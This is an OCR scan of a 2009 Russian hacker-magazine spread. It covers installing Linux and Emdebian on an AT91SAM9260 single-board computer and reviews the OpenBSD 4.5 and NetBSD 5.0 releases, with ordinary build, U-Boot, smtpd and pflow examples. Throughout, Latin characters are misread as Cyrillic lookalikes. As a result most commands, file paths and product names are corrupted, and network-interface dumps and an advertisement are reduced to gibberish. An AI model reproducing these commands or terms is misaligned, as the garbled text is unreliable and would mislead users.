/ЬіпихКегпеІ /аР91заш92 6уек_сіеРсопРід 



на эту флешку скинуть ФС. Но начальная часть носителя уже 
занята, а никакой таблицы разделов, которую мы привыкли 
видетьв начале каждого ІВМ-совместимого диска, у нас 
нет и не будет. Разработчики Еѵаіиабоп КК, не мудрствуя 
лукаво, просто записали список разделов внутрь ядра Еіпих 
(смотри Іі пих— 2.6.27/агсЬ/а гт/ тасЬ-а1:91 /Ьоа гсІ-5апп9260ек. 
с)! Особо внимательныеувидели этотсписокеще на этапе 
загрузки ядра. В общем, файловую систему грузим по адресу 
0x400000 (/беѵ/гтФсІЬІоскІ]. Для начала можно взять пред- 
лагаемую на ІіпихДзат.огд . Ихтам две — это дистрибутивы 
ОрепЕтЬесІсІесІ/АпдзІхопп и более легковесный ВиіШРооІ: 
на базе иСІібс. Готовые базовые образы тоже можно скачать, 
ониуже упакованы вфі^-образ для флеш. 

КакзальешьФС, не забудь обновить переменную ЬооФгдз 
в меню и-ЬооЕ ее значение подставляется в качестве пара- 
метров командной строки ядра: 

ІІ-ВооР> зеРепѵ ЬооРагдз гооР = /с!еѵ/тРс1Ыоск1 

гооРРзРуре=з Р1з2 гѵг 

ІІ-Воок> заѵеепѵ 




НТТР://ѴѴѴШ 

"■ Г 

> Ііпкз 

• Полезный сайт 
по АТ915АМ: 
[іпих4Бат.огд . 

• Хомякунивер- 
сального загруз- 
чика Э-бооС 
ѵѵѵѵѵѵ.сІепх.сІеАл/ікі/Ц- 
ВооЕ 

• Хороший форум раз- 
ра ботч и ко в железа : 

еІесФопіх.ги . 



$ ссі 1іпих-2 .6.27/ 

$ ср ак91заш92 6уек_<іе1соп1ід . сопіід 
$ таке АКСН=агт оісісопіід 
$ таке АКСН=агт теписопіід 
$ таке АКСН=агт СКОЗЗ_СОМРІЬЕ=агт-е11 - 

Дожидаемся окончания компиляции и «обертываем» ядро 
в понятный ІЭ-ВооЕу формат: 

$ ткітаде -А агт -О Ііпих -С попе -Т кегпе1\ 

-а 20008000 -е 20008000 -п 1іпих-2.6\ 

-<і агск/агт/Ьоок / гітаде иітаде 

Параметр '-а 1 сообщает в оперативной памяти, куда загру- 
жать ядро, а 1 -е 1 — откуда его стартовать. Естественно, этот 
адрес не должен пересекаться стем, куда И - Вооі изначаль- 
но копировал образ (0х2200_0000). 

в ФАЙЛОВАЯ СИСТЕМА 

Теперь, когда у нас есть полноценное рабочее ядро Еіпих, 
сумевшее подцепить периферию и ЕІазЬ-карту, неплохо бы 



Надеюсь, все прошлоуспешно, и утебя затребовали 
авторизацию. Пиши логин гооЕ а пароль оставляй пустым. 
Поздравляю, мы в системе! Осматривайся, проверяй, всели 
на месте:). А если возможностей предустановленного дист- 
рибутива тебе показалось мало, то читай дальше. 

н ЕМОЕВІАЫ (ЕМОЕВІАЫ. ОРС) 

Этот ди стр и бути в, как нетрудно догадаться, базируется 
на ОеЬіап и затачивается подлегковесные встраиваемые 
устройства путем выкидывания из пакетов всего лишнего, 
типа документации и локализации. СДебиан на двух моих 
машинах, ЕтбеЬіап был для меня логичным выбором. В на- 
стоящий момент в рамках проекта представлено два релиза 
— Огір и СгизЬ, оба бинарно совместимы с ОеЬіап ОІЧІІ/Еіпих 
5.0 «Иеппу». Я ставил Огір, какболее полновесный на базе 
согеиЫз и діібс. Подробнее о различиях читай на сайте. 
Устанавливается ЕтбеЬіап с помощью стандартного пакета 
ЬеЬооізІхар или набора скриптов етбеЬіап-ЬоІз. Оба вари- 
анта примерно одинаковы по функционалу, выбирай любой. 
Далее ставим все, что найдется по команде «арІ-сасЬе 




> сЫ 

• На прилагаемом 
к журналу диске мож- 
но найти исходники 
ядра и ІЭ-ВооІ: с нало- 
женными патчами, об- 
разы файловых систем 
ОрепЕтЬесИесІ/ 
АпдзФот и ВиіШРооЕ 
а также немного доку- 
ментации по железу. 



ХАКЕР 05 /1 25/ 09 



► 081 











^ ипіхоігі 



ОТЛАЖИВАЕМ ДЕВАЙС ЧЕРЕЗ йВбУ 



зеагсб етсІеЬіап»,— в хозяйстве пригодится. 
Следующий шаг: создаем файл раскадез.сопі" 
с та ким содержимым: 

5СКІРТ= /изг /зЬаге/сІеЪооСзІігар/зсгірС 
з/1еппу 

МІККОК=Ы: Ср : / / шт . ешйеЬіап . огд / дг ір / 
РКОХУ=ЬРРр : / /шт. ешйеЬіап. огд/дгір/ 
81ЛТЕ=зСаЫе 

И запускаем етзапсІЬох: 

етзапсІЬох -а агт -ѵ./ -т./ --шасЫпе-раСЬ. . 

На выходе — запакованный архив с файловой 
системой. Только она пока что нерабочая. 

Суть втом, что скриптне смогдовыполнить 
настройку дистрибутива, так как архитектура, 
на которой он выполнялся (х86) , отличается 



от целевой. В любом случае, в корне по- 
лучившегося образа будетлежать скрипт 
еппзесопсізіаде, который надо всеми правдами 
и неправдами запустить уже на самом девайсе. 
Как это сделать — дело твое. Можешь скинуть 
образ на изб-флешку и воткнуть ее в девайс, 
либо примонтироватьобраз по сети. После 
сбгооПа накати пакеты, живущие в/ѵаг/сасб 
е/арі/агсбіѵез, начиная с ІіЬсб и зузѵіпіі:, иты 
получишь настоящий ОеЬіап. 

в КУДА ДАЛЬШЕ? 

Тут все зависит от наличия у тебя энтузиаз- 
ма, свободного времени и девушки. Делай 
с еще одним появившимся в твоем доме 
компьютером все, что пожелаешь, исполь- 
зуй мощьустановленного на него Линукса 
по максимуму! Для начала, оптимизируй ядро 
и ФС по размеру и эффективности, например, 



выбрось из него поддержку НЮ -устройств 
и всего прочего, что никогда не будет подклю- 
чено кдевайсу. 

Потом можешь попробовать избавиться 
от монстрообразного ІІ-ВооТ Операци- 
онка-загрузчик — это, конечно, хорошо, 
но и 4-килобайтный АТ91 Вооізігар после 
некоторой допилки вполне может подготовить 
контроллер кзагрузке ядра. Далее — подари 
своему одноплатн и ку внешний 115 В -вин чес- 
тер и научи его качатьторренты и раздавать 
файлы по Сети. Вырубив 400-ваттный файл- 
сервер, можно неплохо сэкономить на элект- 
роэнергии. Потом воткни веб-камеру, поставь 
легкий ЬЛр-сервер и следи за территорией 
через страничку, выведенную сквозь файрвол 
в интернет. Короче, непаханое поле для экспе- 
риментов, лишь бы скорости хватало, да вре- 
мени. ИИ 
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Смотри в мае 
на телеканале 
ёатеіапсі.іѵ 
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Техно 



Иі'фС'рмйЦгІЙ- й ЛйД«.Лк>иС , НМі'' ТреБуЙТЁ 

у влшмо рінномалыюго оператора 



0 ЭР ТЕЛЕКйМ ••• 



акдао 



8 плане новостей из мира высоких технологий 
зрителей ждет несколько сюрпризов. Вы увидите 
серию анонсов от 4ррК? ( рассказ о новинках, 
предъявленных на одной нэ европейских 
Шническнх выставок внимательны» анализ 
новой мобильной лннейни №оШ и слмыр. горячий 
модели ноутбуков И Н&тбукіія ЙЙПНЫ этого 
года, Помни, о дате начала пторжени* робота* 
ты узнаешь только из официального органе 
вещания всея механических существ - 
из программы - Техно#. 



Негде: Ежедневно в 1 1:00. 



І 5 ^ 





■ 



1 



I 



Детальный обзор Ые(В50 5«0 

В сегодняшнем ЦІ N IX- мире развитие Ыпих и РгееВБО напомина- 
ет бесконечную гонку за модой, превращающую операционные 
системы в клубок запутанного кода, а сообщества — в рассад- 
ник троллей и надменных гуру. На этом фоне стоящие в сторон- 
ке Ореп/ЫеіВЗО могут стать настоящей отдушиной и примерами 
того, как мудрые люди создают красивые, лишенные попсовости 
операционки. 



і 



нОРЕИВБО. 

Л ИШЬ ДВЕ УДАЛЕННЫЕ 
УЯЗВИМОСТИ ЗА ВСЕ ВРЕМЯ 
СУЩЕСТВОВАНИЯ 

ОрепВВО — проектТЬео бе ВаасЙ и группы еди- 
номышленников, отпочковавшийся от ЫеІВБО 
в 1 995 году и начатый с целью создать 
полностью свободную операционную систему 
с оглядкой на высокую стабильность и безо- 
пасность. ОрепВБО всегда славилась своей 
непотопляемостью, и, если описывать систему 
одним предложением, то получится что-то вро- 
де: «Система для параноидальныхадминов». 

И это правда — код ОрепВБО просто кишит 
многочисленными проверками на валидность 
данных, права доступа и полномочия. Для за- 
труднения возможных атак рандомизируется 
абсолютно все, начиная от Ю процессов и но- 
меров портов и заканчивая страницами вирту- 
альной памяти. Любой код перед включением 
в официальную ветку досконально проверяет- 
ся и анализируется на предметошибок. И даже 
стороннее ПО, включенное в базовую поставку 



системы, распространяется с многочислен- 
ными доработками и заплатками, улучшаю- 
щими стойкость. В рамках проекта написаны 
такие вещи, как незаменимый инструмент 
любого администратора — ОрепББН и едва ли 
не самый продвинутый и удобный в настройке 
брандмауэр рО который сегодня можно найти 
в любой ОС семейства В50. 

Борьба за качество и легальность кода — 
еще одна отличительная черта разработчиков 
ОрепВЗО. Будучи поборниками лицензии ВЗБ 
итолково написанного, лаконичного кода, 
участники проекта готовы доработать и пе- 
реписатьлюбой компонентсистемы, создан- 
ный сторонними разработчиками. В составе 
ОрепВЗй уже распространяется собственная 
реализация системы контроля версий СѴ5, 
сервер и клиент для протоколов ІЧТР, ЗЫМР, 
05РР, ВОР, а в 4.5 войдетеще и демон 5МТР. 
Обсуждается возможность создания простого 
и быстрого компилятора языка Си и замены 
О N 10 Ьіпибіз. Разработчики всегда ратова- 
ли за открытие спецификаций на «железо» 



и без лишних слов брались за написание 
открытых а налогов драйверов, огромное 
количество которых перекочевало в ЫеІВБО 
и РгееВЗБ. 

Лучшее применение ОрепВБй — сетевые 
маршрутизаторы и мосты, где ОС в полной 
красе покажет свои возможности. 

в В НАЧАЛЕ НОЯБРЯ 
2008 ГОДА УВИДЕЛА СВЕТ 

0репВ504.4. В состав ее вошли ОрепББН 5.1 , 
пригодный к использованию ОрепСѴБ, утилиты 
зузтегде и ІюрЬепсЬ, а также несколько новых 
драйверов и улучшений в подсистемах ядра 
(самым главным из которых стала поддержка 
ѴѴРА/ѴѴРА2 для беспроводных устройств) 
и стандартных утилитах. Что же нас ждет в но- 
вом релизе? Первое, что обращает на себя вни- 
мание — зтТрсІ , безопасный, легкий, удобный 
в настройке БМТР-демон, который нацелен 
не столько заменить всемогущий зепбтаіі, 
сколько обеспечить простоту развертывания 
и удобство использования. В конфигурацион- 
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ном файле используется рі'-подобный синтаксис: 

Пример конфигурационного 
файла зтірсі 

ІізСеп оп ІосаІЬозС рогС 25 
НюзСпате ІосаІЬозС 
ассерС Гог сіотаіп " ІосаІЬюзГ " 
сіеііѵег Со тЬох " /ѵаг /таіі / %и" 
ассерГ Ггот $1оса1 Гог аіі геіау 

Сервер уже включен в дерево исходных кодов и умеет все, 
что может потребоваться в 95% случаев. 

В состав версии 4.5 вошел ОрепЗВН 5.2, который может 
похвастать та кими нововведениями: 

• Клиентская опция 1 -у 1 для отправки логов в зузіод вмес- 
то зіеіегг, что может потребоваться при запуске в режиме 
демона. 

• Директива конфигурационного файла РогсеСоттапб 
теперь принимаетаргументы для внутреннего зіір-сервера. 

• ззбб стал понимать опции РегтііЕтрІуРаззѵѵогбз 

и АІІоѵѵАдепіЕогѵѵагсІіпд, прописанные в блоках Ма1:сЬ. 

• Удаленное перенаправление портов с прослушиваемым 
портом 0 (в этом случае сервер должен динамически выде- 
лить порти сообщить его клиенту]. 

• Поддержка протокола 50СК54А для динамического пере- 
направления портов, которое, кстати, теперь можно настро- 
ить и через командную строку клиента, доступную по ~С. 
Кроме новых возможностей, в ОрепЗЗН 5.2устранены две 
теоретическиеуязвимости и исправлен десятокбагов. 

Код стека ЫиеІооіЬ синхронизирован с ЫеіВЗО и поумол- 
чанию включен в код ядра для платформ аірба, атб64, 
агтізб, Ирра , І386, Іапсіізк, таерре, зрагс64 и гаигиз. До- 
бавлены демон Ы:б (8), утилита Ыюб. (8) и конфигурационный 
файл ЬГсопІ (5) для управления ЫиеІооіН-устройствами. 

В код беспроводного стека добавлена начальная реали- 
зация 802.1 1х РМК5А кэширования и преаутентификации, 
поддержка протокола ВІР (ВгоабсазДМиШсазІ; I піед гіЕу 
Ргоіюсоі] для 802.1 1 ѵѵ. Включен коддефрагментации 
для приема М5РІІ и ММ РОИ фрагментов. Драйвера ірѵѵ (4) 
и іѵѵі (4] теперь поддерживаютѴѴРА. Опция сбап, передан- 
ная ібсопбід (8), приводит к печати всех поддерживаемых 



каналов, а зсап выводитсписокдосягаемыхточекдоступа. 
Из ядра удален код реализации /беѵ/бгит и/беѵ/ргапбот. 
Добавлена поддержка семейства процессоров АРМ9е 
для платформы АРМ. РРМ-модули іпІеШгпп и габеопбгт, 
необходимые для поддержки аппаратного ускорения на со- 
ответствующих видеокартах, теперь поумолчанию включе- 
ны в ядро. Генератор случайных чисел отныне возвращает 
собственноезначениедля каждого процессора. Список 
поддерживаемых платформ пополнился еще двумя пози- 
циями: дитзбх и ОрепМоко, хотя реализация последней 
настолько примитивна, что может использоваться только 
для тестирования. Добавлено новое псевдоустройство рИоѵѵ 
(4), которое экспортирует данные ІР-аккаунтинга через ІЮР 
в совместимом с ЫеіРІоѵѵ 5 формате. Чтобы настроить интер- 
фейс рИоѵѵ, нужно выполнить следующие команды: 

# іГсопГід рГ1оѵ\Ю сгеаГе 

# ІГсопГід рГ1оѵ\Ю Псжзгс 192.168.1.2 ПомсІзГ 

192.168.1.1:1234 




> іпіо 



• Новые версии 
ОрепВЗР выходят 
каждые пол года: 

1 мая и 1 ноября. 

• В ОрепВЗР не ис- 
пользуются драйвера 
со скомпилирован- 
ными объектными 
модулями с нерас- 
крываемым исход- 
ным кодом. 



Для примера произведем учет ІСМР-запросов, приходящих 
на внешний сетевой интерфейс: 

Иозіі # ѵі/еіе/р*. соггі 

разз іп оп $ехГ_іГ іпеГ ргоГо істр Со ($ехГ_іГ) 
кеер зГаГе (рПом) 

ГюзГІ# рГсП -Г/еГс/рГ. сопГ 
1іозЦ2# ріпд ІюзШ 

ЬозДІ# ріекі -ѵзз I дгер -ВІ рііоѵ^ I Ьеасі 
аіі істр 77.41. XX. УУ: 1 <- 212.34. XX. УУ: 
45333 0:0 

аде 00:00:02, ехрігез іп 00:00:09, 2:0 рккз, 
168:0 Ьукез, гиіе 14, рііоѵ^ 

Псевдоустройство р^зупс (4) переведено на использо- 
вание протокола пятой версии, который не совместим 
с предыдущими. В дсс и дбЬ добавлена поддержка РІЕ 
(Розібоп Іпберепбепі: ЕхесікаЫез], которые рандомизируют 
размещение кода, данных, стека и блока библиотек внутри 
исполняемого файла. Утилиты ізіаі: (1 ], рзіаі: (8) и некоторые 
переменные зузсИ больше не показываютсмещения в фай- 



• Удобный сервис 
по работе с деревом 
портов ОрепВВО: 

ЬирУ/орепрогІз.зе . 




> СІѴСІ 

• На прилагаемом 
кжурналу диске ты 
найдешь ОрепВВР 4.5 
иЫе1В5В5.0. 
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ІТІДОШ - ЛТОПГ*/іГИІГи*ГНХк. 



ИІО: ІІадэ-й^^иР.ВНОЛОСаЗТ^иШіте.РКОМІЗС.ЗІИРЬЕХгІШЬТІСМ^ ті.и ІЬОО 
Ііаскіг 00 : (И :еа: Я: 43: Гб 
ргіогіЛу; О 
дгоирз: міап 

тгчіі л : ТР.ЕЕ802.1] лиіг.опс ] г-сГ. гтюгіг: 1 1д ЪОЯЫр 
яІг.йГия: лс±іѵе 



Іеее802і1: пѵій ѵіап сЬап 11 Ьззі4 00 : 01:еа: 91: 43:16 нрарзк <поР йізріау 
ирарсосов Иря1,нр-я2 краакгаа рвк ирасьрЬеь’з икір, с стр ѵградгоирсірГіег скір 100 

сШтгЛ 



ІПГГЙ ГрВОі : ?ПГіОгі (Т : Гг^І : 4 Т: Г ^ % г л 1 П ргрП ХІО'П 64 дсорМ гі Гі х Рі 
ЬгісідгО: Г Ілд:і-4 1 <[!Р р КИШ ІКГг> йіі.и 1^0 0 

ргіогіъу: 0 
дгоирн: Ьгісіде 

рИодО: ііадз-1 4КТІР, ПУКИ I N6, РКйМІ8С> піііи 132(И 
ргіргіиу: 0 
дгоирз : рПод 

1 -лзпП: Гіадл - 9 Й 4 Л<иР,ВЙОА^ПАЯТ 1 РИНМТНа х ЙГМРГ.КХ г ІЯНКО, МШ,ТТ№ЗТ> шГлз 1500 
1 ІасісЗг 00 : Ъб.і 08 : ЗЬ : О : 01 
ргіогііу: О 

іоес 192 Л 68. 2.1 вешая к ОхСКШОО Ьгоагісаас 192 Л 68 . 2 . 255 

іі'іегй ГеЙОі : ?ІКІ:8ГГ: ГеЧЬ: ГЗП1 Л Г итіП рг^Гі *1 Е'чі 64 Й^проій 0::0 
рПомО: П нцх-1 СТТР> лиги 1 ДЪ2 

ргіОгіЬу: 0 

рі іои: зепсіег: 0,0.0. 0 гесеіѵег: 0.0. 0.0:0 
дгоира: рИоч 



ПРОСМАТРИВАЕМ СПИСОК ДОСТУПНЫХ СЕТЕВЫХ ИНТЕРФЕЙСОВ 



з: 



лах и другую информацию для пользователей, 
не владеющих этими файлами (гооі; по-пре- 
жнему видит все]. Ядро ОрепВЗО обзавелось 
поддержкой алгоритмов НМАС-М05, НМАС- 
5НА1, НМАС-5НА256, АЕ5-128-СМАС и АЕ5 
«Кеу ѴѴгар», которые используются для ас- 
си метричного шифрования других ключей 
(смотри /изг/згс/зуз/сгурЫ. 

В гезоіѵ.сопі" теперь можно указывать номер 
порта для записей патезегѵег.то есть строка 
вида «патезегѵег 1 7.16.67.143:5353» будет 
корректно обработана, и все запросы пойдут 
на порт 5353 вместо стандартного 53-го. 
Множество изменений было произведено 
в аисаЕ Теперьутилита потребляетменьше 
процессорных мощностей, умеет слушать 
несколько сокетов с отдельным уровнем 
громкости для каждого потока и может работать 
в режиме обратной петли. Все это превра- 
щаетпрограмму в настоящий аудио-сервер, 
способный выступать в качестве замены ]аск 
или РиІзеАисІіо. Для примера приведу команду 
запуска аисаі в режиме сервера с двумя слуша- 
ющими сокетами, громкость одного из которых 
установлена в 65 (сіеба и и] , а второго — выкру- 
чена на полную (гшах): $ аисаД -1 -ѵ 65-з 
ШеДаиШ -ѵ 127-з шах. Стандартный кли- 
ент іЧр теперь умеет игнорировать псевдоката- 
логи (чтобы рекурсивныезакачки не создавали 
бесконечный цикл], корректно докачивать 
файлы, поддерживает прокси, защищенные 
паролем, и флаг ' -п 1 для получения только 
обновленных файлов. 

Во многихутилитах исправлены ошибки 
и выловлены утечки памяти. Решена проблема 
ВНО_ВНСР_ОРТІОЫ5_ОѴЕРІ_ОАВ в бЬсрсІ (8) 



и проблема неправильного обновления в коде 
ВСР, которая могла привести к незапланиро- 
ванному закрытию сессии. Закрыты бреши 
безопасности в коде 0реп55І_ и патеб (8]. 

В коде АСРІ устранена паника на нетбуках Азиз 
еееРС 1000Н и добавлен воркараунддля сбой- 
ных АСРІ ВІОЗ’ов. 

в ЫЕТВ 50 . 

РАБОТАЕТ ДАЖЕ 
НА ТОСТЕРАХ 

ІЧеіВЗО — первая ОС семейства В50, родивша- 
яся в 1 993 году на кодовой базе 4.3В50 ЫеТ/2, 
4.4В50-І_іІе и 4.4В50-І_і1:е2, распространяемых 
калифорнийским университетом Беркли. 
Лозунг Ые^ВЗБ — «Конечно, ІЧе^ВЗБ может 
работать и на этом» (ОІсоигзе б гипз ЫеІВБО]. 
Система портирована на 60 аппаратных плат- 
форм, для каждой из которых доступны тысячи 
прекомпилированных пакетов. Причем сама 
система сборки пакетов, именуемая ркдзгс, 
способна работать практически на любой 
РОЗІХ-совместимой системе без каких-либо 
затруднений. 

Что тут скажешь? Целостность ОС и прорабо- 
танность дизайна всех компонентов системы, 
ставшие следствием высокой портабельнос- 
ти,— одно из важнейших достоинств ІЧеіВЗО. 

в ЫЕТВББ 5.0 

Если 0репВ50 4.5 — релиз минорный, боль- 
ших изменений в себе не несущий, то анонс 
ІЧеіВЗО 5.0 — событие громкое и значимое. 
С момента выхода 4.0 прошло уже более 
двух лет. За это время разработчики пере- 
носимой ВЗБ добавили в свое творение 



множество самых разнообразных, интерес- 
ных (порой — неожиданных] новшеств. 
Наиболеезначительные изменения произош- 
ли в ядре ОС. Теперь ЕЕЗ имеет поддержку 
журналирования; добавлен код реализации 
1 : 1 потоков; переработаны планировщик 
процессов и система блокировок; реализа- 
ция таііосзаменена на іетаІАос; портнаХеп 
обновлен до версии 3.3; интегрирована новая, 
независимая отархитектуры система управле- 
ния питанием и обмена сообщениями между 
драйверами РМЕ; появилась поддержка АСРІ 
зизрепб/гезите, новый фреймворкгитр 
для запуска частей ядра в пространстве поль- 
зователя и системы риіЧздля реализации фай- 
ловых систем вне ядра. Добавлено множество 
новых драйверов и обновлены существующие. 
Обо всем подробнее. Коджурналирования 
метаданных ѴѴАРВЕ (ѴѴгТе Абеаб РЬузісаІ Віоск 
Еоддіпд] подарен проекту компанией ѴѴазаЬі 
Зузіетз, использующей его аж с 2003-го года 
(ничего удивительного — несколько ведущих 
разработчиков ІЧеіВЗО работают в этой ком- 
пании]. Это реализация классической модели 
журналирования всех операций записи блоков 
перед их непосредственным применением. 
Изюминка системы втом, что она нетребует 
какого-либо преобразования ФС (достаточ- 
но просто добавить опцию Іод в/еІсЛзІаб] 
и в большинстве задач показывает производи- 
тельность выше, чем зо^-берепбепсіез (зо^- 
ирбаіез, говоря на языке ЕгееВЗБ]. 

Появилась поддержка чтения с файловых 
систем ЕЕЗ (разработка Зііісоп СгарЫсз] и НЕ5+ 
(файловая система Арріе]. На конец добавлена 
утилита пе\л^з_ех12{з (8) для создания файло- 
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ЫЕТВ5Р ПРЕКРАСНО ЧУВСТВУЕТ СЕБЯ НА ТОСТЕРЕ... 



вых систем реализация которой, кроме 
того, обзавелась поддержкой 32-битных полей 
иіб/діб. Существенноувеличена производи- 
тельность тзсіозіз, скорость записи на которую 
теперь может происходить до 16 раз быстрее. 
Интегрирована команда тоип^зузсШъ (8), 
позволяющая представитьдерево переменных 
зузсіі в виде файловой системы. ОС научи- 
лась писать в ІЮР, для чего были добавлены 
соответствующие изменения в ядро и две 
новыеутилиты: ттсіюгтаі: (8) и пеѵѵізщісіі 1 (8). 
Код файловой системы и піопіз синхронизиро- 
ван с РгееВЗБ, а поддержка Ы0ЫР5 удалена 
из состава ядра. Особого внимания заслужи- 
ваетфреймворкгитр (ПиппаЫе ІІзегзрасе 
Меіа Ргодгатз), позволяющий запускать части 
ядра как пользовательские процессы. Питр 



придает ЫеіВЗО черты настоящей микроядер- 
ной ОС, но идея, лежащая в его основе, очень 
проста. Сам фреймворк представляет собой 
не что иное, каквынесенный в пространство 
пользователя набор внутриядерных функций. 
Он используется высокоуровневыми, неза- 
висимыми отаппаратной платформы частями 
ядра для доступа к низкоуровневым. Вместе 
с гитр в ЫеіВЗО вошла и программа гитр_пі : 5 
(8), реализующая клиент ЫР5 в пространстве 
пользователя. Более того, любую файловую 
системутеперь можно перекомпилировать 
для работы вне ядра. 

Другая интересная новинка ядра — риРз 
(Разз-Іо-ІІзегзрасе Ргатеѵѵогк Рііе Зузіет] — 
фреймворк, использующий возможности гитр 
и позволяющий реализовать файловую систе- 



...И РАЗЛИЧНЫХ ВСТРАИВАЕМЫХ 
УСТРОЙСТВАХ 



мулюбой сложности полностью в пространстве 
пользователя. Вместе с фреймворком также 
добавлены файловые системы, использующие 
его ВОЗМОЖНОСТИ: 

• тоип^рззЫз (8) — виртуальная файловая 
система для монтирования зРр-сессий; 

• тоипІ^риіІзроНаІ (8) — экспериментальная 
реализация роНаРз в пространстве пользо- 
вателя; 

• тоип1:_9р (8) — файловая система для мон- 
тирования файловых сервисов 9Р (протокол, 
применяемый в распределенных операцион- 
ных системах Р1ап9 и I пбегпо) . 

Поверх риРз создана обертка совмести- 
мости с РИЗЕ (Рііе зузіет іп ІІЗЕгзрасе, 
Іизе.зРпеР . Пример подключения 
зРр-сессии с помощью тоип^рззЫз: 
шоипС_рзз1ібз -О Сотргеззіоп=уез 
ѵазуа@1юзС . сот: /изг /шпС 
В ядро импортированы переработанные 
системы блокировок, реализованные в ветках 
пеѵѵІоск2 и ѵтІоскіпд2, а также патч для бло- 



СТОРОННЕЕ ПО В БАЗОВОЙ 
ПОСТАВКЕ ЫЕТВ50 5.0 

ірН.1.29 
ВІШ9.5.0-Р2 
ОТР4.2.4р6 
ОрепЬБАР 2.4.11 
ОрепРАМ 20071221 
Ореп55Н5.0 

ОрепЗЗЬ снапшот от 20080509 
Розгйх 2.5.4 

СЖІ ССС 4.1 снапшот от 20080831 
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кировки сокетов. Изменению подвергся 
и код библиотеки ІіЬрІЬгеасІ, в которую было 
добавлено несколько улучшений в области 
синхронизации потоков. Модель потоков 5Аза- 
менена на 1 :1 . Код реализации та Нос заменен 
на іетаііос из ЕгееВЭО, оптимизированный 
для многонитевых приложений. Интегрирован 
модульный планировщик5СНЕ0_М2, который 
показывает высокую производительность 
на многопроцессорных системах, поддержива- 
ет исполнение процессов в реальном времени 
и позволяет выбирать алгоритм планирования, 
не останавливая систему. Теперь ЫеіВВО 
более масштабируема и показываетзамет- 
ный прирост производительности на МР- 
системах. Большим изменениям подвергся 
код совместимости с І_іпих (сотраМіпих (8) 
и сотраІ_Ііпих32]. Из ЕгееВЭО импортирован 
код поддержки Л5, добавлены системные 
вызовы деібдісі, оШ_ипате, геасИіг, ргеаб, 
рѵѵгііе, тіоск, типіоск, тзупс, 5уз_с1оск 
{деігез, деШте, зеШте} и несколько систем- 
ных вызовов семейства сбоѵѵп. Обновлена 
поддержка ІРС, добавлена поддержка оззаисііо 
(3). Виртуальная файловая система ргосіз 
теперь экспорти рует/ргос/зіаі;, /ргос/іоасіаѵд 
и/ргос/<рісІ>/5ІаІт. Обновлена поддержка 
эмуляции 32-битной ЫеШБО (сотра1_пе1:Ь5СІ32 
(8)], удалена поддержка эмуляции НР-ІІХ 
(сотраІ_брих). Код реализации «магичес- 
ких символических ссылок», позволяющий 
симлинкам указывать на разные файлы 
в зависимости от значения одной или не- 
скольких специальных переменных, обновлен 
и поддерживает переменную ѲгиісІ, которая 
раскрывается в «настоящий» ІІЮ процесса. 

Эта возможность используется для создания 
изолированного Лтрдля каждого пользовате- 
ля (опция «рег_іі5ег_1тр=уе5» в/еіс/гс.сопі]. 
Магические си мл инки — довольно простой, 
но полезный механизм, который позволяет 
сделать, например, так (на машине х86 ~/Ьіп 
будет указывать на ~/Ьіп-і386): 

# зузсБІ ѵбз . депегіс .шадіс1іпкз=1 

$ 1п -з/Ьоте/ѵазуа/Ъіп-© 

тасМпе / Боте / ѵа зу а / Ьіп 

Обновлен стек ЫиеІооіЬ и сопутствующие ути- 
литы. В ядро добавлен драйвер для ВІиеІооіБ 
НСІ ІІАВТ, написанный с оглядкой на І_іпих- 
драйвера В1ие2 и позволяющий пересылать 
пакеты через последовательный порт. До- 
бавлены демон ЫиаНб (8), который управляет 
работой драйвера, Ьрапб (8), управляющий 
профилями РАЫ (ВІиеІооіБ РегзопаІАгеа 
Ыеіѵѵогкіпд) и Ыкеу (1) — программа для рабо- 
ты с ключами соединений. Утилита іісопбд (8) 
по команде «Іізі зсап»теперь выдаетсписок 
досягаемых точек доступа. 

Из других изменений внутри ядра можно 
отметить работу на консоли МісгозоАХЬох, 
поддержку ЭРМ (Оігесі: Репбегіпд Мападег], 
необходимую для работы 20 - и 30-ускорения 
в видеодрайверах, поддержку РІЕ. ПортнаХеп 



обновлен до версии 3.3, добавлена поддержка 
архитектуры атб64 (ботО и ботіі] и расши- 
рения І386 РАЕ для ботіі. Из соображений 
безопасности удален механизм зузігасе. 

Ядро теперь еще больше совместимо с Р05ІХ 
и поддерживает та кие расширения стандарта 
как: Р05ІХ Реаі-бте, АзупсЬгопоиз 1/0 и Р05ІХ 
теззаде диеиез. Псевдодрайвер ^азіАрзес (4) 
обучили работе стехнологией ІРЗес ЫАТ-Т, код 
брандмауэра рб (4) синхронизирован сОрепВЭО 
4.2. Появилась поддержка « і рѵб Іазі Іопл/агб». 
Второй стадией загрузки теперь можно управ- 
лять через конфигурационный файл ЬооЕсІд 
(8), пример которого приведен ниже: 

тегш=ВооС погтаііу: ЪооБ пеБЪзс! 
теті=Вооб зіпдіе изег: ЬооБ пеБЪзб. -з 
тепи=ВізаЫе АСРІ : ЪооБ пеБЪзсІ -2 
шепи=БізаЫе АСРІ апб ЗМР: ЪооБ 
пеБЪзсі -12 

тепи=Бгор Со ЪооБ рготрБ : рготрБ 

с!е1аиІЦ = 1 

БітеоиБ=5 

В базовое окружение ЫеіВЭО были добавлены: 

• Утилиты аибіБ-раскадез 

и <боѵт1оасІ-ѵи1пегаЬі1іБу-1ізБ 
для поиска известных уязвимостей 
в установленных пакетах. 

• Утилита асрібооіз, импортирован- 
ная из РгееВЗБ. 

• с99 — враппер, запускающий сс в режи- 
ме совместимости со стандартом С99 . 

• Бргоі — простой профайлер, осно- 
ванный на идее мониторинга произво- 
дительности . 

• зсБебсБІ — программа, предназна- 
ченная для управления планированием 
процессов и потоков . 

• рзгзеБ — утилита для управления 
группами процессоров . 

• срисБІ — позволяет легко вклю- 
чить/отключить нужный процессор. 



• с!кзсап_Ъзс11аЬе1 — инструмент 

для поиска «ВЗБ сІізкІаЪеІ» на диске. 

Переработке и модернизации также подверг- 
лись существующие утилиты: 

• атб теперь умеет запрашивать карты 
( атсі тарз ) у сервера ББАР . 

• сопіід научился генерировать конфи- 
гурационный файл БІШ? для ядра (флаг 

'-Б') • 

• пехѵзузіод сожмет файлы ло- 
гов с помощью Ьзір2 , если указать 
флаг ' Б ' в конфигурационном фай- 
ле /екс /пемзу зі од . сопі . 

• ЪіосБІ существенно переработана 
и теперь умеет создавать/удалять 
«Боб- враге», диски «разз-ББгоидБ» 
и КАІБ-тома, запускать /останавли- 
вать проверки на согласованность 
данных в томах. 

• раБсБ импортирован из БгадопРІу. 

• зсИББ импортирован из ОрепВЗБ. 

• хагдз импортирован из РгееВЗБ. 

В базовую поставку были включены НБрб — 
простой НТТР-сервер, написанный на Си, 
и ббсрсб 4.0.1 1 . 

